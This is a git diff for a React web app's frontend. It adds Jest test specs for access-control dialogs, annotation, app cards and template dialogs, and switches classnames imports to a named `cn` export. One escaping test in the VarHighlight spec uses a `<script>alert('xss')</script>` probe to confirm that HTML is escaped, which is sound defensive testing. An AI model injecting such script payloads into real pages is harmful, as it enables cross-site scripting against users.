screen.findByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + fireEvent.click(confirmButton) + + await waitFor(() => { + expect(props.onRemove).toHaveBeenCalledTimes(1) + expect(props.onHide).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/annotation/view-annotation-modal/index.tsx b/web/app/components/app/annotation/view-annotation-modal/index.tsx index 8426ab0005..d21b177098 100644 --- a/web/app/components/app/annotation/view-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/view-annotation-modal/index.tsx @@ -14,7 +14,7 @@ import TabSlider from '@/app/components/base/tab-slider-plain' import { fetchHitHistoryList } from '@/service/annotation' import { APP_PAGE_LIMIT } from '@/config' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { appId: string diff --git a/web/app/components/app/app-access-control/access-control-dialog.tsx b/web/app/components/app/app-access-control/access-control-dialog.tsx index ee3fa9650b..99cf6d7074 100644 --- a/web/app/components/app/app-access-control/access-control-dialog.tsx +++ b/web/app/components/app/app-access-control/access-control-dialog.tsx @@ -2,7 +2,7 @@ import { Fragment, useCallback } from 'react' import type { ReactNode } from 'react' import { Dialog, Transition } from '@headlessui/react' import { RiCloseLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type DialogProps = { className?: string diff --git a/web/app/components/app/app-access-control/access-control.spec.tsx b/web/app/components/app/app-access-control/access-control.spec.tsx new file mode 100644 index 0000000000..ea0e17de2e --- /dev/null +++ b/web/app/components/app/app-access-control/access-control.spec.tsx @@ -0,0 +1,389 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import AccessControl from './index' +import AccessControlDialog from './access-control-dialog' +import AccessControlItem from './access-control-item' +import AddMemberOrGroupDialog from './add-member-or-group-pop' +import SpecificGroupsOrMembers from './specific-groups-or-members' +import useAccessControlStore from '@/context/access-control-store' +import { useGlobalPublicStore } from '@/context/global-public-context' +import type { AccessControlAccount, AccessControlGroup, Subject } from '@/models/access-control' +import { AccessMode, SubjectType } from '@/models/access-control' +import Toast from '../../base/toast' +import { defaultSystemFeatures } from '@/types/feature' +import type { App } from '@/types/app' + +const mockUseAppWhiteListSubjects = jest.fn() +const mockUseSearchForWhiteListCandidates = jest.fn() +const mockMutateAsync = jest.fn() +const mockUseUpdateAccessMode = jest.fn(() => ({ + isPending: false, + mutateAsync: mockMutateAsync, +})) + +jest.mock('@/context/app-context', () => ({ + useSelector: (selector: (value: { userProfile: { email: string; id?: string; name?: string; avatar?: string; avatar_url?: string; is_password_set?: boolean } }) => T) => selector({ + userProfile: { + id: 'current-user', + name: 'Current User', + email: 'member@example.com', + avatar: '', + avatar_url: '', + is_password_set: true, + }, + }), +})) + +jest.mock('@/service/common', () => ({ + fetchCurrentWorkspace: jest.fn(), + 
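+  // Stub the endpoints the shared context providers may call on mount so the
+  // component tree renders without real network requests.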
fetchLangGeniusVersion: jest.fn(), + fetchUserProfile: jest.fn(), + getSystemFeatures: jest.fn(), +})) + +jest.mock('@/service/access-control', () => ({ + useAppWhiteListSubjects: (...args: unknown[]) => mockUseAppWhiteListSubjects(...args), + useSearchForWhiteListCandidates: (...args: unknown[]) => mockUseSearchForWhiteListCandidates(...args), + useUpdateAccessMode: () => mockUseUpdateAccessMode(), +})) + +jest.mock('@headlessui/react', () => { + const DialogComponent: any = ({ children, className, ...rest }: any) => ( +
<div role='dialog' className={className} {...rest}>
+   {children}
+  </div>
+ ) + DialogComponent.Panel = ({ children, className, ...rest }: any) => ( +
<div className={className} {...rest}>
+   {children}
+  </div>
+ ) + const DialogTitle = ({ children, className, ...rest }: any) => ( +
<div className={className} {...rest}>
+   {children}
+  </div>
+ ) + const DialogDescription = ({ children, className, ...rest }: any) => ( +
<div className={className} {...rest}>
+   {children}
+  </div>
+ ) + const TransitionChild = ({ children }: any) => ( + <>{typeof children === 'function' ? children({}) : children} + ) + const Transition = ({ show = true, children }: any) => ( + show ? <>{typeof children === 'function' ? children({}) : children} : null + ) + Transition.Child = TransitionChild + return { + Dialog: DialogComponent, + Transition, + DialogTitle, + Description: DialogDescription, + } +}) + +jest.mock('ahooks', () => { + const actual = jest.requireActual('ahooks') + return { + ...actual, + useDebounce: (value: unknown) => value, + } +}) + +const createGroup = (overrides: Partial = {}): AccessControlGroup => ({ + id: 'group-1', + name: 'Group One', + groupSize: 5, + ...overrides, +} as AccessControlGroup) + +const createMember = (overrides: Partial = {}): AccessControlAccount => ({ + id: 'member-1', + name: 'Member One', + email: 'member@example.com', + avatar: '', + avatarUrl: '', + ...overrides, +} as AccessControlAccount) + +const baseGroup = createGroup() +const baseMember = createMember() +const groupSubject: Subject = { + subjectId: baseGroup.id, + subjectType: SubjectType.GROUP, + groupData: baseGroup, +} as Subject +const memberSubject: Subject = { + subjectId: baseMember.id, + subjectType: SubjectType.ACCOUNT, + accountData: baseMember, +} as Subject + +const resetAccessControlStore = () => { + useAccessControlStore.setState({ + appId: '', + specificGroups: [], + specificMembers: [], + currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS, + selectedGroupsForBreadcrumb: [], + }) +} + +const resetGlobalStore = () => { + useGlobalPublicStore.setState({ + systemFeatures: defaultSystemFeatures, + isGlobalPending: false, + }) +} + +beforeAll(() => { + class MockIntersectionObserver { + observe = jest.fn(() => undefined) + disconnect = jest.fn(() => undefined) + unobserve = jest.fn(() => undefined) + } + // @ts-expect-error jsdom does not implement IntersectionObserver + globalThis.IntersectionObserver = MockIntersectionObserver +}) + +beforeEach(() => { + jest.clearAllMocks() + resetAccessControlStore() + resetGlobalStore() + mockMutateAsync.mockResolvedValue(undefined) + mockUseUpdateAccessMode.mockReturnValue({ + isPending: false, + mutateAsync: mockMutateAsync, + }) + mockUseAppWhiteListSubjects.mockReturnValue({ + isPending: false, + data: { + groups: [baseGroup], + members: [baseMember], + }, + }) + mockUseSearchForWhiteListCandidates.mockReturnValue({ + isLoading: false, + isFetchingNextPage: false, + fetchNextPage: jest.fn(), + data: { pages: [{ currPage: 1, subjects: [groupSubject, memberSubject], hasMore: false }] }, + }) +}) + +// AccessControlItem handles selected vs. 
unselected styling and click state updates
+describe('AccessControlItem', () => {
+ it('should update current menu when selecting a different access type', () => {
+  useAccessControlStore.setState({ currentMenu: AccessMode.PUBLIC })
+  render(
+   <AccessControlItem type={AccessMode.ORGANIZATION}>
+    Organization Only
+   </AccessControlItem>,
+  )
+
+  const option = screen.getByText('Organization Only').parentElement as HTMLElement
+  expect(option).toHaveClass('cursor-pointer')
+
+  fireEvent.click(option)
+
+  expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.ORGANIZATION)
+ })
+
+ it('should keep current menu when clicking the selected access type', () => {
+  useAccessControlStore.setState({ currentMenu: AccessMode.ORGANIZATION })
+  render(
+   <AccessControlItem type={AccessMode.ORGANIZATION}>
+    Organization Only
+   </AccessControlItem>,
+  )
+
+  const option = screen.getByText('Organization Only').parentElement as HTMLElement
+  fireEvent.click(option)
+
+  expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.ORGANIZATION)
+ })
+})
+
+// AccessControlDialog renders a headless UI dialog with a manual close control
+describe('AccessControlDialog', () => {
+ it('should render dialog content when visible', () => {
+  render(
<AccessControlDialog show onClose={jest.fn()}>
+    <div>Dialog Content</div>
+   </AccessControlDialog>
, + ) + + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByText('Dialog Content')).toBeInTheDocument() + }) + + it('should trigger onClose when clicking the close control', async () => { + const handleClose = jest.fn() + const { container } = render( + +
<AccessControlDialog show onClose={handleClose}>
+    <div>Dialog Content</div>
+   </AccessControlDialog>
, + ) + + const closeButton = container.querySelector('.absolute.right-5.top-5') as HTMLElement + fireEvent.click(closeButton) + + await waitFor(() => { + expect(handleClose).toHaveBeenCalledTimes(1) + }) + }) +}) + +// SpecificGroupsOrMembers syncs store state with fetched data and supports removals +describe('SpecificGroupsOrMembers', () => { + it('should render collapsed view when not in specific selection mode', () => { + useAccessControlStore.setState({ currentMenu: AccessMode.ORGANIZATION }) + + render() + + expect(screen.getByText('app.accessControlDialog.accessItems.specific')).toBeInTheDocument() + expect(screen.queryByText(baseGroup.name)).not.toBeInTheDocument() + }) + + it('should show loading state while pending', async () => { + useAccessControlStore.setState({ appId: 'app-1', currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS }) + mockUseAppWhiteListSubjects.mockReturnValue({ + isPending: true, + data: undefined, + }) + + const { container } = render() + + await waitFor(() => { + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + }) + + it('should render fetched groups and members and support removal', async () => { + useAccessControlStore.setState({ appId: 'app-1', currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS }) + + render() + + await waitFor(() => { + expect(screen.getByText(baseGroup.name)).toBeInTheDocument() + expect(screen.getByText(baseMember.name)).toBeInTheDocument() + }) + + const groupItem = screen.getByText(baseGroup.name).closest('div') + const groupRemove = groupItem?.querySelector('.h-4.w-4.cursor-pointer') as HTMLElement + fireEvent.click(groupRemove) + + await waitFor(() => { + expect(screen.queryByText(baseGroup.name)).not.toBeInTheDocument() + }) + + const memberItem = screen.getByText(baseMember.name).closest('div') + const memberRemove = memberItem?.querySelector('.h-4.w-4.cursor-pointer') as HTMLElement + fireEvent.click(memberRemove) + + await waitFor(() => { + expect(screen.queryByText(baseMember.name)).not.toBeInTheDocument() + }) + }) +}) + +// AddMemberOrGroupDialog renders search results and updates store selections +describe('AddMemberOrGroupDialog', () => { + it('should open search popover and display candidates', async () => { + const user = userEvent.setup() + + render() + + await user.click(screen.getByText('common.operation.add')) + + expect(screen.getByPlaceholderText('app.accessControlDialog.operateGroupAndMember.searchPlaceholder')).toBeInTheDocument() + expect(screen.getByText(baseGroup.name)).toBeInTheDocument() + expect(screen.getByText(baseMember.name)).toBeInTheDocument() + }) + + it('should allow selecting members and expanding groups', async () => { + const user = userEvent.setup() + render() + + await user.click(screen.getByText('common.operation.add')) + + const expandButton = screen.getByText('app.accessControlDialog.operateGroupAndMember.expand') + await user.click(expandButton) + expect(useAccessControlStore.getState().selectedGroupsForBreadcrumb).toEqual([baseGroup]) + + const memberLabel = screen.getByText(baseMember.name) + const memberCheckbox = memberLabel.parentElement?.previousElementSibling as HTMLElement + fireEvent.click(memberCheckbox) + + expect(useAccessControlStore.getState().specificMembers).toEqual([baseMember]) + }) + + it('should show empty state when no candidates are returned', async () => { + mockUseSearchForWhiteListCandidates.mockReturnValue({ + isLoading: false, + isFetchingNextPage: false, + fetchNextPage: jest.fn(), + data: { pages: [] }, + }) + + const user = 
userEvent.setup() + render() + + await user.click(screen.getByText('common.operation.add')) + + expect(screen.getByText('app.accessControlDialog.operateGroupAndMember.noResult')).toBeInTheDocument() + }) +}) + +// AccessControl integrates dialog, selection items, and confirm flow +describe('AccessControl', () => { + it('should initialize menu from app and call update on confirm', async () => { + const onClose = jest.fn() + const onConfirm = jest.fn() + const toastSpy = jest.spyOn(Toast, 'notify').mockReturnValue({}) + useAccessControlStore.setState({ + specificGroups: [baseGroup], + specificMembers: [baseMember], + }) + const app = { + id: 'app-id-1', + access_mode: AccessMode.SPECIFIC_GROUPS_MEMBERS, + } as App + + render( + , + ) + + await waitFor(() => { + expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.SPECIFIC_GROUPS_MEMBERS) + }) + + fireEvent.click(screen.getByText('common.operation.confirm')) + + await waitFor(() => { + expect(mockMutateAsync).toHaveBeenCalledWith({ + appId: app.id, + accessMode: AccessMode.SPECIFIC_GROUPS_MEMBERS, + subjects: [ + { subjectId: baseGroup.id, subjectType: SubjectType.GROUP }, + { subjectId: baseMember.id, subjectType: SubjectType.ACCOUNT }, + ], + }) + expect(toastSpy).toHaveBeenCalled() + expect(onConfirm).toHaveBeenCalled() + }) + }) + + it('should expose the external members tip when SSO is disabled', () => { + const app = { + id: 'app-id-2', + access_mode: AccessMode.PUBLIC, + } as App + + render( + , + ) + + expect(screen.getByText('app.accessControlDialog.accessItems.external')).toBeInTheDocument() + expect(screen.getByText('app.accessControlDialog.accessItems.anyone')).toBeInTheDocument() + }) +}) diff --git a/web/app/components/app/app-access-control/add-member-or-group-pop.tsx b/web/app/components/app/app-access-control/add-member-or-group-pop.tsx index e9519aeedf..17263fdd46 100644 --- a/web/app/components/app/app-access-control/add-member-or-group-pop.tsx +++ b/web/app/components/app/app-access-control/add-member-or-group-pop.tsx @@ -11,7 +11,7 @@ import Input from '../../base/input' import { PortalToFollowElem, PortalToFollowElemContent, PortalToFollowElemTrigger } from '../../base/portal-to-follow-elem' import Loading from '../../base/loading' import useAccessControlStore from '../../../../context/access-control-store' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useSearchForWhiteListCandidates } from '@/service/access-control' import type { AccessControlAccount, AccessControlGroup, Subject, SubjectAccount, SubjectGroup } from '@/models/access-control' import { SubjectType } from '@/models/access-control' @@ -32,7 +32,7 @@ export default function AddMemberOrGroupDialog() { const anchorRef = useRef(null) useEffect(() => { - const hasMore = data?.pages?.[0].hasMore ?? false + const hasMore = data?.pages?.[0]?.hasMore ?? false let observer: IntersectionObserver | undefined if (anchorRef.current) { observer = new IntersectionObserver((entries) => { @@ -106,7 +106,7 @@ function SelectedGroupsBreadCrumb() { setSelectedGroupsForBreadcrumb([]) }, [setSelectedGroupsForBreadcrumb]) return
- 0 && 'cursor-pointer text-text-accent')} onClick={handleReset}>{t('app.accessControlDialog.operateGroupAndMember.allMembers')} + 0 && 'cursor-pointer text-text-accent')} onClick={handleReset}>{t('app.accessControlDialog.operateGroupAndMember.allMembers')} {selectedGroupsForBreadcrumb.map((group, index) => { return
/ @@ -198,7 +198,7 @@ type BaseItemProps = { children: React.ReactNode } function BaseItem({ children, className }: BaseItemProps) { - return
+ return
{children}
} diff --git a/web/app/components/app/app-publisher/index.tsx b/web/app/components/app/app-publisher/index.tsx index bba5ebfa21..5aea337f85 100644 --- a/web/app/components/app/app-publisher/index.tsx +++ b/web/app/components/app/app-publisher/index.tsx @@ -42,6 +42,7 @@ import type { InputVar, Variable } from '@/app/components/workflow/types' import { appDefaultIconBackground } from '@/config' import { useGlobalPublicStore } from '@/context/global-public-context' import { useFormatTimeFromNow } from '@/hooks/use-format-time-from-now' +import { useAsyncWindowOpen } from '@/hooks/use-async-window-open' import { AccessMode } from '@/models/access-control' import { useAppWhiteListSubjects, useGetUserCanAccessApp } from '@/service/access-control' import { fetchAppDetailDirect } from '@/service/apps' @@ -50,6 +51,7 @@ import { AppModeEnum } from '@/types/app' import type { PublishWorkflowParams } from '@/types/workflow' import { basePath } from '@/utils/var' import UpgradeBtn from '@/app/components/billing/upgrade-btn' +import { trackEvent } from '@/app/components/base/amplitude' const ACCESS_MODE_MAP: Record = { [AccessMode.ORGANIZATION]: { @@ -153,6 +155,7 @@ const AppPublisher = ({ const { data: userCanAccessApp, isLoading: isGettingUserCanAccessApp, refetch } = useGetUserCanAccessApp({ appId: appDetail?.id, enabled: false }) const { data: appAccessSubjects, isLoading: isGettingAppWhiteListSubjects } = useAppWhiteListSubjects(appDetail?.id, open && systemFeatures.webapp_auth.enabled && appDetail?.access_mode === AccessMode.SPECIFIC_GROUPS_MEMBERS) + const openAsyncWindow = useAsyncWindowOpen() const noAccessPermission = useMemo(() => systemFeatures.webapp_auth.enabled && appDetail && appDetail.access_mode !== AccessMode.EXTERNAL_MEMBERS && !userCanAccessApp?.result, [systemFeatures, appDetail, userCanAccessApp]) const disabledFunctionButton = useMemo(() => (!publishedAt || missingStartNode || noAccessPermission), [publishedAt, missingStartNode, noAccessPermission]) @@ -187,11 +190,12 @@ const AppPublisher = ({ try { await onPublish?.(params) setPublished(true) + trackEvent('app_published_time', { action_mode: 'app', app_id: appDetail?.id, app_name: appDetail?.name }) } catch { setPublished(false) } - }, [onPublish]) + }, [appDetail, onPublish]) const handleRestore = useCallback(async () => { try { @@ -217,17 +221,19 @@ const AppPublisher = ({ }, [disabled, onToggle, open]) const handleOpenInExplore = useCallback(async () => { - try { + await openAsyncWindow(async () => { + if (!appDetail?.id) + throw new Error('App not found') const { installed_apps }: any = await fetchInstalledAppList(appDetail?.id) || {} if (installed_apps?.length > 0) - window.open(`${basePath}/explore/installed/${installed_apps[0].id}`, '_blank') - else - throw new Error('No app found in Explore') - } - catch (e: any) { - Toast.notify({ type: 'error', message: `${e.message || e}` }) - } - }, [appDetail?.id]) + return `${basePath}/explore/installed/${installed_apps[0].id}` + throw new Error('No app found in Explore') + }, { + onError: (err) => { + Toast.notify({ type: 'error', message: `${err.message || err}` }) + }, + }) + }, [appDetail?.id, openAsyncWindow]) const handleAccessControlUpdate = useCallback(async () => { if (!appDetail) diff --git a/web/app/components/app/app-publisher/suggested-action.tsx b/web/app/components/app/app-publisher/suggested-action.tsx index 2535de6654..154bacc361 100644 --- a/web/app/components/app/app-publisher/suggested-action.tsx +++ 
b/web/app/components/app/app-publisher/suggested-action.tsx @@ -1,6 +1,6 @@ import type { HTMLProps, PropsWithChildren } from 'react' import { RiArrowRightUpLine } from '@remixicon/react' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type SuggestedActionProps = PropsWithChildren & { icon?: React.ReactNode @@ -19,11 +19,9 @@ const SuggestedAction = ({ icon, link, disabled, children, className, onClick, . href={disabled ? undefined : link} target='_blank' rel='noreferrer' - className={classNames( - 'flex items-center justify-start gap-2 rounded-lg bg-background-section-burn px-2.5 py-2 text-text-secondary transition-colors [&:not(:first-child)]:mt-1', + className={cn('flex items-center justify-start gap-2 rounded-lg bg-background-section-burn px-2.5 py-2 text-text-secondary transition-colors [&:not(:first-child)]:mt-1', disabled ? 'cursor-not-allowed opacity-30 shadow-xs' : 'cursor-pointer text-text-secondary hover:bg-state-accent-hover hover:text-text-accent', - className, - )} + className)} onClick={handleClick} {...props} > diff --git a/web/app/components/app/configuration/base/feature-panel/index.tsx b/web/app/components/app/configuration/base/feature-panel/index.tsx index ec5ab96d76..c9ebfefbe5 100644 --- a/web/app/components/app/configuration/base/feature-panel/index.tsx +++ b/web/app/components/app/configuration/base/feature-panel/index.tsx @@ -1,7 +1,7 @@ 'use client' import type { FC, ReactNode } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type IFeaturePanelProps = { className?: string diff --git a/web/app/components/app/configuration/base/group-name/index.spec.tsx b/web/app/components/app/configuration/base/group-name/index.spec.tsx new file mode 100644 index 0000000000..ac504247f2 --- /dev/null +++ b/web/app/components/app/configuration/base/group-name/index.spec.tsx @@ -0,0 +1,21 @@ +import { render, screen } from '@testing-library/react' +import GroupName from './index' + +describe('GroupName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render name when provided', () => { + // Arrange + const title = 'Inputs' + + // Act + render() + + // Assert + expect(screen.getByText(title)).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.spec.tsx b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx new file mode 100644 index 0000000000..615a1769e8 --- /dev/null +++ b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx @@ -0,0 +1,70 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import OperationBtn from './index' + +jest.mock('@remixicon/react', () => ({ + RiAddLine: (props: { className?: string }) => ( + + ), + RiEditLine: (props: { className?: string }) => ( + + ), +})) + +describe('OperationBtn', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering icons and translation labels + describe('Rendering', () => { + it('should render passed custom class when provided', () => { + // Arrange + const customClass = 'custom-class' + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.add').parentElement).toHaveClass(customClass) + }) + it('should render add icon when type is add', () => { + // Arrange + const onClick = jest.fn() + + // Act + render() + + // Assert + expect(screen.getByTestId('add-icon')).toBeInTheDocument() + 
expect(screen.getByText('common.operation.add')).toBeInTheDocument() + }) + + it('should render edit icon when provided', () => { + // Arrange + const actionName = 'Rename' + + // Act + render() + + // Assert + expect(screen.getByTestId('edit-icon')).toBeInTheDocument() + expect(screen.queryByTestId('add-icon')).toBeNull() + expect(screen.getByText(actionName)).toBeInTheDocument() + }) + }) + + // Click handling + describe('Interactions', () => { + it('should execute click handler when button is clicked', () => { + // Arrange + const onClick = jest.fn() + render() + + // Act + fireEvent.click(screen.getByText('common.operation.add')) + + // Assert + expect(onClick).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.tsx b/web/app/components/app/configuration/base/operation-btn/index.tsx index aba35cded2..db19d2976e 100644 --- a/web/app/components/app/configuration/base/operation-btn/index.tsx +++ b/web/app/components/app/configuration/base/operation-btn/index.tsx @@ -6,7 +6,7 @@ import { RiAddLine, RiEditLine, } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { noop } from 'lodash-es' export type IOperationBtnProps = { diff --git a/web/app/components/app/configuration/base/var-highlight/index.spec.tsx b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx new file mode 100644 index 0000000000..9e84aa09ac --- /dev/null +++ b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx @@ -0,0 +1,62 @@ +import { render, screen } from '@testing-library/react' +import VarHighlight, { varHighlightHTML } from './index' + +describe('VarHighlight', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering highlighted variable tags + describe('Rendering', () => { + it('should render braces around the variable name with default styles', () => { + // Arrange + const props = { name: 'userInput' } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText('userInput')).toBeInTheDocument() + expect(screen.getAllByText('{{')[0]).toBeInTheDocument() + expect(screen.getAllByText('}}')[0]).toBeInTheDocument() + expect(container.firstChild).toHaveClass('item') + }) + + it('should apply custom class names when provided', () => { + // Arrange + const props = { name: 'custom', className: 'mt-2' } + + // Act + const { container } = render() + + // Assert + expect(container.firstChild).toHaveClass('mt-2') + }) + }) + + // Escaping HTML via helper + describe('varHighlightHTML', () => { + it('should escape dangerous characters before returning HTML string', () => { + // Arrange + const props = { name: '' } + + // Act + const html = varHighlightHTML(props) + + // Assert + expect(html).toContain('<script>alert('xss')</script>') + expect(html).not.toContain(' & Special "Chars"', + }, + } + render() + + expect(screen.getByText('App & Special "Chars"')).toBeInTheDocument() + }) + + it('should handle onCreate function throwing error', async () => { + const errorOnCreate = jest.fn(() => { + throw new Error('Create failed') + }) + + // Mock console.error to avoid test output noise + const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn()) + + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + let capturedError: unknown + try { + await userEvent.click(button) + } + catch (err) { + capturedError = err + } + expect(errorOnCreate).toHaveBeenCalledTimes(1) + 
expect(consoleSpy).toHaveBeenCalled() + if (capturedError instanceof Error) + expect(capturedError.message).toContain('Create failed') + + consoleSpy.mockRestore() + }) + }) + + describe('Accessibility', () => { + it('should have proper elements for accessibility', () => { + const { container } = render() + + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('svg')).toBeInTheDocument() + }) + + it('should have title attribute for app name when truncated', () => { + render() + + const nameElement = screen.getByText('Test Chat App') + expect(nameElement).toHaveAttribute('title', 'Test Chat App') + }) + + it('should have accessible button with proper label', () => { + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + expect(button).toBeEnabled() + expect(button).toHaveTextContent('app.newApp.useTemplate') + }) + }) + + describe('User-Visible Behavior Tests', () => { + it('should show plus icon in create button', () => { + render() + + expect(screen.getByTestId('plus-icon')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/create-app-dialog/app-card/index.tsx b/web/app/components/app/create-app-dialog/app-card/index.tsx index 7f7ede0065..df35a74ec7 100644 --- a/web/app/components/app/create-app-dialog/app-card/index.tsx +++ b/web/app/components/app/create-app-dialog/app-card/index.tsx @@ -3,7 +3,7 @@ import { useTranslation } from 'react-i18next' import { PlusIcon } from '@heroicons/react/20/solid' import { AppTypeIcon, AppTypeLabel } from '../../type-selector' import Button from '@/app/components/base/button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { App } from '@/models/explore' import AppIcon from '@/app/components/base/app-icon' @@ -15,6 +15,7 @@ export type AppCardProps = { const AppCard = ({ app, + canCreate, onCreate, }: AppCardProps) => { const { t } = useTranslation() @@ -45,14 +46,16 @@ const AppCard = ({ {app.description}
- ) } diff --git a/web/app/components/app/create-app-dialog/app-list/index.tsx b/web/app/components/app/create-app-dialog/app-list/index.tsx index 51b6874d52..4655d7a676 100644 --- a/web/app/components/app/create-app-dialog/app-list/index.tsx +++ b/web/app/components/app/create-app-dialog/app-list/index.tsx @@ -11,7 +11,7 @@ import AppCard from '../app-card' import Sidebar, { AppCategories, AppCategoryLabel } from './sidebar' import Toast from '@/app/components/base/toast' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import ExploreContext from '@/context/explore-context' import type { App } from '@/models/explore' import { fetchAppDetail, fetchAppList } from '@/service/explore' diff --git a/web/app/components/app/create-app-dialog/app-list/sidebar.tsx b/web/app/components/app/create-app-dialog/app-list/sidebar.tsx index 85c55c5385..89062cdcf9 100644 --- a/web/app/components/app/create-app-dialog/app-list/sidebar.tsx +++ b/web/app/components/app/create-app-dialog/app-list/sidebar.tsx @@ -1,7 +1,7 @@ 'use client' import { RiStickyNoteAddLine, RiThumbUpLine } from '@remixicon/react' import { useTranslation } from 'react-i18next' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Divider from '@/app/components/base/divider' export enum AppCategories { @@ -40,13 +40,13 @@ type CategoryItemProps = { } function CategoryItem({ category, active, onClick }: CategoryItemProps) { return
<li className={cn('group', active && 'active')} onClick={() => { onClick?.(category) }}> {category === AppCategories.RECOMMENDED && <RiThumbUpLine />
} + <AppCategoryLabel category={category} + className={cn('system-sm-medium text-components-menu-item-text group-hover:text-components-menu-item-text-hover group-[.active]:text-components-menu-item-text-active', active && 'system-sm-semibold')} />
</li> } diff --git a/web/app/components/app/create-app-dialog/index.spec.tsx b/web/app/components/app/create-app-dialog/index.spec.tsx new file mode 100644 index 0000000000..db4384a173 --- /dev/null +++ b/web/app/components/app/create-app-dialog/index.spec.tsx @@ -0,0 +1,287 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import CreateAppTemplateDialog from './index' + +// Mock external dependencies (not base components) +jest.mock('./app-list', () => { + return function MockAppList({ + onCreateFromBlank, + onSuccess, + }: { + onCreateFromBlank?: () => void + onSuccess: () => void + }) { + return ( +
+ <div data-testid='app-list'> + <button type='button' data-testid='app-list-success' onClick={onSuccess}>success</button> + {onCreateFromBlank && ( + <button type='button' data-testid='create-from-blank' onClick={onCreateFromBlank}>create from blank</button> + )} + </div> +
    + ) + } +}) + +jest.mock('ahooks', () => ({ + useKeyPress: jest.fn((_key: string, _callback: () => void) => { + // Mock implementation for testing + return jest.fn() + }), +})) + +describe('CreateAppTemplateDialog', () => { + const defaultProps = { + show: false, + onSuccess: jest.fn(), + onClose: jest.fn(), + onCreateFromBlank: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should not render when show is false', () => { + render() + + // FullScreenModal should not render any content when open is false + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + + it('should render modal when show is true', () => { + render() + + // FullScreenModal renders with role="dialog" + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByTestId('app-list')).toBeInTheDocument() + }) + + it('should render create from blank button when onCreateFromBlank is provided', () => { + render() + + expect(screen.getByTestId('create-from-blank')).toBeInTheDocument() + }) + + it('should not render create from blank button when onCreateFromBlank is not provided', () => { + const { onCreateFromBlank: _onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps + + render() + + expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument() + }) + }) + + describe('Props', () => { + it('should pass show prop to FullScreenModal', () => { + const { rerender } = render() + + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + + rerender() + expect(screen.getByRole('dialog')).toBeInTheDocument() + }) + + it('should pass closable prop to FullScreenModal', () => { + // Since the FullScreenModal is always rendered with closable=true + // we can verify that the modal renders with the proper structure + render() + + // Verify that the modal has the proper dialog structure + const dialog = screen.getByRole('dialog') + expect(dialog).toBeInTheDocument() + expect(dialog).toHaveAttribute('aria-modal', 'true') + }) + }) + + describe('User Interactions', () => { + it('should handle close interactions', () => { + const mockOnClose = jest.fn() + render() + + // Test that the modal is rendered + const dialog = screen.getByRole('dialog') + expect(dialog).toBeInTheDocument() + + // Test that AppList component renders (child component interactions) + expect(screen.getByTestId('app-list')).toBeInTheDocument() + expect(screen.getByTestId('app-list-success')).toBeInTheDocument() + }) + + it('should call both onSuccess and onClose when app list success is triggered', () => { + const mockOnSuccess = jest.fn() + const mockOnClose = jest.fn() + render() + + fireEvent.click(screen.getByTestId('app-list-success')) + + expect(mockOnSuccess).toHaveBeenCalledTimes(1) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should call onCreateFromBlank when create from blank is clicked', () => { + const mockOnCreateFromBlank = jest.fn() + render() + + fireEvent.click(screen.getByTestId('create-from-blank')) + + expect(mockOnCreateFromBlank).toHaveBeenCalledTimes(1) + }) + }) + + describe('useKeyPress Integration', () => { + it('should set up ESC key listener when modal is shown', () => { + const { useKeyPress } = require('ahooks') + + render() + + expect(useKeyPress).toHaveBeenCalledWith('esc', expect.any(Function)) + }) + + it('should handle ESC key press to close modal', () => { + const { useKeyPress } = require('ahooks') + let capturedCallback: (() => void) | undefined + + useKeyPress.mockImplementation((key: string, 